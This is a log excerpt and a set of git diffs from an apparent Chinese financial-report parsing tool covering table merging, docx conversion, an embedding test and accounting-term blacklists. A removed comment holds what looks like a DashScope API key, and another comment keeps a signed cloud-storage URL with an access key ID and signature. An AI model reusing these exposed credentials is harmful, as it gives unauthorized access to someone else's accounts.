'1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:04,179|zzb_logger : INFO 等待所有子任务完成任务ID:201917
2024-12-29 16:21:04,179|zzb_logger : INFO Run task 2457-2815 (38332)...
2024-12-29 16:21:04,179|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:04,886|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:23:00,285|zzb_logger : INFO 所有子任务完成任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 启动指标归一化任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 向量更新时间 127.97 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据查询 0.17 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO update_ori_measure方法走的是半年报
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据更新 0.00 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 更新数据写入 0.05 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 归一化完成任务ID:201917
2024-12-29 16:23:00,522|zzb_logger : INFO 任务 201917 完成耗时344.83 秒。
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=1
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态任务:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>
2024-12-29 16:23:00,821|zzb_logger : INFO 任务 201917 完成

View File

@ -427,19 +427,18 @@ def process_text_content(file_id,texts,tables,full_texts,type =0):
"type" : "text", "type" : "text",
'content' : line_text, 'content' : line_text,
}},conn,cursor,"word_parse_process") }},conn,cursor,"word_parse_process")
# 给慎用词校验用
# 给慎用词校验用 db_service_word.insert_word_parse_process({
db_service_word.insert_word_parse_process({ 'file_id': file_id,
'file_id': file_id, 'page_num': t["index"],
'page_num': t["index"], 'page_count': 100,
'page_count': 100, 'type': 'text',
'type': 'text', 'content': {
'content': { 'page_num': t["index"],
'page_num': t["index"], 'table_index': t["index"],
'table_index': t["index"], "type": "text",
"type": "text", 'content': line_text,
'content': line_text, }}, conn, cursor, "word_parse_data")
}}, conn, cursor, "word_parse_data")
table_name = "word_text_info" table_name = "word_text_info"
if type == 1: if type == 1:
@ -519,12 +518,12 @@ def get_table_measure(file_id, word_tables, record_range):
record_start = record_range.split('-')[0] record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1] record_end = record_range.split('-')[1]
for index in range(int(record_start),int(record_end)): for index in range(int(record_start),int(record_end)):
t = word_tables[index] t = word_tables[index][0]
measure_obj =[] measure_obj =[]
data_dict = {} data_dict = {}
measure_list = [] measure_list = []
try: try:
arr = np.array(t['data']) arr = np.array(t["data"])
rows, cols = arr.shape rows, cols = arr.shape
if rows == 1 and cols == 1: if rows == 1 and cols == 1:
continue continue
@ -679,7 +678,7 @@ def update_measure_data(file_id,file_path,parent_table_pages):
# 创建一个cursor对象来执行SQL语句 # 创建一个cursor对象来执行SQL语句
cursor_app = conn_app.cursor(buffered=True) cursor_app = conn_app.cursor(buffered=True)
applog.info(f'目录黑名单为:{parent_table_pages}') applog.info(f'目录黑名单为:{parent_table_pages}')
db_service_word.delete_to_run(conn,cursor,file_id) # db_service_word.delete_to_run(conn,cursor,file_id)
db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path) db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path)
# #指标归一化处理 # #指标归一化处理
@ -692,15 +691,39 @@ def update_measure_data(file_id,file_path,parent_table_pages):
def merge_consecutive_arrays(word_info): def merge_consecutive_arrays(word_info):
merged_objects = [] merged_objects = []
temp_list = []
for info_obj in word_info: for info_obj in word_info:
try: try:
if info_obj['type'] == 'table': if info_obj['type'] == 'table':
# 如果对象是表格,将其元素添加到临时列表中 # 如果对象是表格,将其元素添加到临时列表中
merged_objects.append(info_obj) data = info_obj['data']
if not data:
continue
first_row = data[0]
if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
temp_list.append(info_obj)
elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
merged_objects.append(temp_list)
temp_list = []
temp_list.append(info_obj)
elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
temp_data = temp_list[-1]['data']
temp_data = list(temp_data)
for row in list(info_obj['data']):
temp_data.append(row)
info_obj['data'] = temp_data
temp_list.clear()
temp_list.append(info_obj)
except Exception as e: except Exception as e:
applog.error(f"解析数据错误: {e}") applog.error(f"解析数据错误: {e}")
if temp_list:
merged_objects.append(temp_list)
return merged_objects return merged_objects
def merge_consecutive_arrays_v1(pdf_info): def merge_consecutive_arrays_v1(pdf_info):
@ -775,7 +798,6 @@ def start_table_measure_job(file_id):
records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT) records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT)
processes = [] processes = []
for record_range in records_range_parts: for record_range in records_range_parts:
# get_table_measure(file_id,word_tables,record_range,)
p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,)) p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,))
processes.append(p) processes.append(p)
p.start() p.start()

View File

@ -252,8 +252,8 @@ def append_to_file(file_path, text):
if __name__ == "__main__": if __name__ == "__main__":
current_directory = os.getcwd() current_directory = os.getcwd()
docx_relative_path = 'file/docx/101.docx' docx_relative_path = '..\\file\\docx\\101.docx'
file_relative_path = 'file/docx/test1.txt' file_relative_path = '..\\file\\docx\\test1.txt'
docx_path = os.path.join(current_directory, docx_relative_path) docx_path = os.path.join(current_directory, docx_relative_path)
file_path = os.path.join(current_directory, file_relative_path) file_path = os.path.join(current_directory, file_relative_path)
try: try:

View File

@ -1,22 +1,20 @@
from http import HTTPStatus from dashscope import BatchTextEmbedding
import dashscope import requests
#
# dashscope.api_key='sk-2d6352a4c9b142f58b75cd9c8222bd91'
# messages = [{'role': 'system', 'content': 'You are a helpful assistant.'},
# {'role': 'user', 'content': '如何做西红柿鸡蛋?'}]
#
# response = dashscope.Generation.call(
# model='qwen-turbo',
# messages=messages,
# result_format='message', # set the result to be "message" format.
# )
#
# if response.status_code == HTTPStatus.OK:
# print(response)
# else:
# print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
# response.request_id, response.status_code,
# response.code, response.message
# ))
print("sdas00"*2) def call():
result = BatchTextEmbedding.call(BatchTextEmbedding.Models.text_embedding_async_v1,
url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
# url='http://127.0.0.1:text_embedding_file.txt'
text_type="document")
url = result.output.url
response = requests.get(url)
# 检查请求是否成功
if response.status_code == 200:
# 获取网页的 HTML 内容
html_content = response.text
print(html_content)
if __name__ == '__main__':
call()

View File

@ -7,9 +7,14 @@ import json
from datetime import datetime from datetime import datetime
import re,os,time import re,os,time
import requests import requests
import config
import numpy as np import numpy as np
from docx2pdf import convert
from config import api_key
dashscope.api_key = api_key
def get_md5(str): def get_md5(str):
import hashlib import hashlib
@ -53,8 +58,7 @@ def get_clean_text(text):
#terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"] #terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"]
#不可以出现同比之类的 #不可以出现同比之类的
terms_4 = ['', '', '','','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资'] terms_4 = ['', '', '','','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资']
dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
"2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
#dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"] #dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"]
if any(term in text for term in terms_4): if any(term in text for term in terms_4):
return text return text
@ -90,7 +94,7 @@ def get_clean_text(text):
return pattern.sub(lambda match: replacements[match.group(0)], text) return pattern.sub(lambda match: replacements[match.group(0)], text)
text = replace_all(text, replacement_dict) text = replace_all(text, replacement_dict)
#单独出现12月31日时就剔除掉 #单独出现12月31日时就剔除掉
pattern_year = r'(?<!2023年|2022年|2021年)12月31日' pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
text = re.sub(pattern_year, '', text) text = re.sub(pattern_year, '', text)
pattern = r"\[^]*\|\([^)]*\)" # 增加英文括号的匹配 pattern = r"\[^]*\|\([^)]*\)" # 增加英文括号的匹配
@ -111,7 +115,7 @@ def get_clean_text(text):
"": "", "": "",
"年内到期":"年内到期", "年内到期":"年内到期",
"16月":"", "16月":"",
"发行新股":"发行新股", "发行新股":"发行新股",
} }
#针对text的括号内容进行识别判断 #针对text的括号内容进行识别判断
for match in matches: for match in matches:
@ -129,6 +133,21 @@ def get_clean_text(text):
text = re.sub(r"[^\w\s]", "", text) text = re.sub(r"[^\w\s]", "", text)
return text return text
def convert_docx_to_pdf(file_path):
# 检查文件是否为 .docx 格式
if file_path.lower().endswith('.docx'):
# 生成 PDF 文件路径
pdf_path = os.path.splitext(file_path)[0] + '.pdf'
try:
# 执行转换
convert(file_path, pdf_path)
print(f"转换成功: {pdf_path}")
except Exception as e:
print(f"转换失败: {e}")
else:
print("错误: 文件必须是 .docx 格式。")
def save_pdf_from_url(url, file_path): def save_pdf_from_url(url, file_path):
from urllib.parse import unquote from urllib.parse import unquote
# 发起 GET 请求并保存文件 # 发起 GET 请求并保存文件
@ -142,9 +161,10 @@ def save_pdf_from_url(url, file_path):
# 从处理后的URL中提取文件名 # 从处理后的URL中提取文件名
# 提取文件名 # 提取文件名
file_name = url_without_params.split('/')[-1] file_name = url_without_params.split('/')[-1]
#https://financial-report-test.obs.cn-east-3.myhuaweicloud.com:443/upload/file/909f3dd3337a4dd4bc24fb4748c6c76e.PDF?AccessKeyId=IIDIMIUZ1UBBVPKIVB4W&Expires=1726798358&Signature=fKgrDPjmd99Nje4wwvBJxmFlXZY%3D
# 指定本地文件保存路径 # 指定本地文件保存路径
local_file_path = file_path + file_name local_file_path = file_path + file_name
# local_file_path = convert_docx_to_pdf(local_file_path)
with open(local_file_path, 'wb') as file: with open(local_file_path, 'wb') as file:
file.write(response.content) file.write(response.content)
@ -279,20 +299,39 @@ def check_black_list(meta_measure, pdf_measure, black_array):
def check_black_list_old(meta_measure,pdf_measure): def check_black_list_old(meta_measure,pdf_measure):
# 判断指标名是否包含黑名单词 # 判断指标名是否包含黑名单词
#black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日'] #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总' black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润','扣非净利润:净资产,净利率,年度公司' ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除' ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除','非经常性损益:扣除非经常性损益' ,'扣非净利润:净资产,净利率,年度公司'
,'基本每股收益:稀释每股收益,发行新股','稀释每股收益:基本每股收益,发行新股','总资产:净资产','应收账款:应付账款,年以上,内,至,到' ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到','应付账款:应收账款,年以上,内,至,到','长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押','研发投入:比例,比率,占比,费用,占' ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
,'资本化研发投入:比例,比率,占比,费用,占','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用' ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
,'上年年末:1月1日','期加权平均净资产收益率:同比,扣除,扣非,年化,每股' ,'非经常性损益:扣除非经常性损益'
,'基本每股收益:稀释每股收益,发行新股'
,'稀释每股收益:基本每股收益,发行新股'
,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
,'应付账款:应收账款,年以上,内,至,到'
,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
,'研发投入:比例,比率,占比,费用,占'
,'资本化研发投入:比例,比率,占比,费用,占'
,'资本化研发投入占比:金额,费用'
,'研发投入占营业收入比例:金额,费用'
,'上年年末:1月1日'
,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
,'期扣非加权平均净资产收益率:同比,年化,每股' ,'期扣非加权平均净资产收益率:同比,年化,每股'
,'加权平均净资产收益率同比变动:年化,每股' ,'加权平均净资产收益率同比变动:年化,每股'
,'研发费用:制造,投入,直接,管理','应收账款:1-2年','货币资金:在途' ,'研发费用:制造,投入,直接,管理'
,'当期:2023年1-6月,调整后','营业成本:营业总成本','长期借债:年内到期','研发投入:直接' ,'应收账款:1-2年','货币资金:在途'
,'第一季度:第二季度,第三季度,第四季度','第二季度:第一季度,第三季度,第四季度','第三季度:第二季度,第一季度,第四季度','第四季度:第二季度,第三季度,第一季度' ,'当期:2023年1-6月,调整后'
,'研发费用:研发支出,研发投入','存货:跌价准备','费用:日常,付现','固定资产:改良,补助,投资'] ,'营业成本:营业总成本'
,'长期借债:年内到期','研发投入:直接'
,'第一季度:第二季度,第三季度,第四季度'
,'第二季度:第一季度,第三季度,第四季度'
,'第三季度:第二季度,第一季度,第四季度'
,'第四季度:第二季度,第三季度,第一季度'
,'研发费用:研发支出,研发投入','存货:跌价准备'
,'费用:日常,付现','固定资产:改良,补助,投资']
# current_period = f'当期:{report_year}年1-6月' # current_period = f'当期:{report_year}年1-6月'
# black_array.append(current_period) # black_array.append(current_period)
for black in black_array: for black in black_array:
@ -303,12 +342,13 @@ def check_black_list_old(meta_measure,pdf_measure):
if pdf_measure.find(pdf) >= 0: if pdf_measure.find(pdf) >= 0:
return True return True
return False return False
def check_white_list(meta_measure,pdf_measure): def check_white_list(meta_measure,pdf_measure):
white_array = ['基本每股收益:每股收益', '加权平均净资产收益率同比变动:比', '季度变动比例:比', '加权平均净资产收益率:比'] white_array = ['基本每股收益:每股收益','加权平均净资产收益率同比变动:比','季度变动比例:比']
for black in white_array: for black in white_array:
black_meta = black.split(':')[0] black_meta = black.split(':')[0]
black_pdfs = black.split(':')[1].split(',') black_pdfs = black.split(':')[1].split(',')
if meta_measure.find(black_meta) >= 0: if black_meta in meta_measure:
for pdf in black_pdfs: for pdf in black_pdfs:
if pdf_measure.find(pdf) < 0: if pdf_measure.find(pdf) < 0:
return True return True
@ -384,7 +424,7 @@ def check_table_title_black_list_measure(text):
#black_array = ['补充资料:研发费用,管理费用,财务费用' #black_array = ['补充资料:研发费用,管理费用,财务费用'
# ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总' # ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
#] #]
table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产""" table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产|计息金融工具|坏账准备"""
if len(re.findall(table_title_black_list, text)) > 0: if len(re.findall(table_title_black_list, text)) > 0:
return True return True
return False return False
@ -493,6 +533,8 @@ def check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,co
,'持有待售资产:固定资产' ,'持有待售资产:固定资产'
,'账龄超过 1 年或逾期的重要应付账款:应付账款' ,'账龄超过 1 年或逾期的重要应付账款:应付账款'
,'经营租赁资产:固定资产' ,'经营租赁资产:固定资产'
,'计息金融工具:货币资金,短期借款,交易性金融资产'
,'坏账准备:应收账款'
] ]
for black in black_array: for black in black_array:
black_meta = black.split(':')[0] black_meta = black.split(':')[0]
@ -514,6 +556,7 @@ def check_black_table_list(data):
black_meta = black.split(':')[0] black_meta = black.split(':')[0]
black_pdfs = black.split(':')[1].split(',') black_pdfs = black.split(':')[1].split(',')
if any(black_meta in cell for row in data for cell in row): if any(black_meta in cell for row in data for cell in row):
print(data)
for pdf in black_pdfs: for pdf in black_pdfs:
data = [row for row in data if not any(pdf in cell for cell in row)] data = [row for row in data if not any(pdf in cell for cell in row)]
return data return data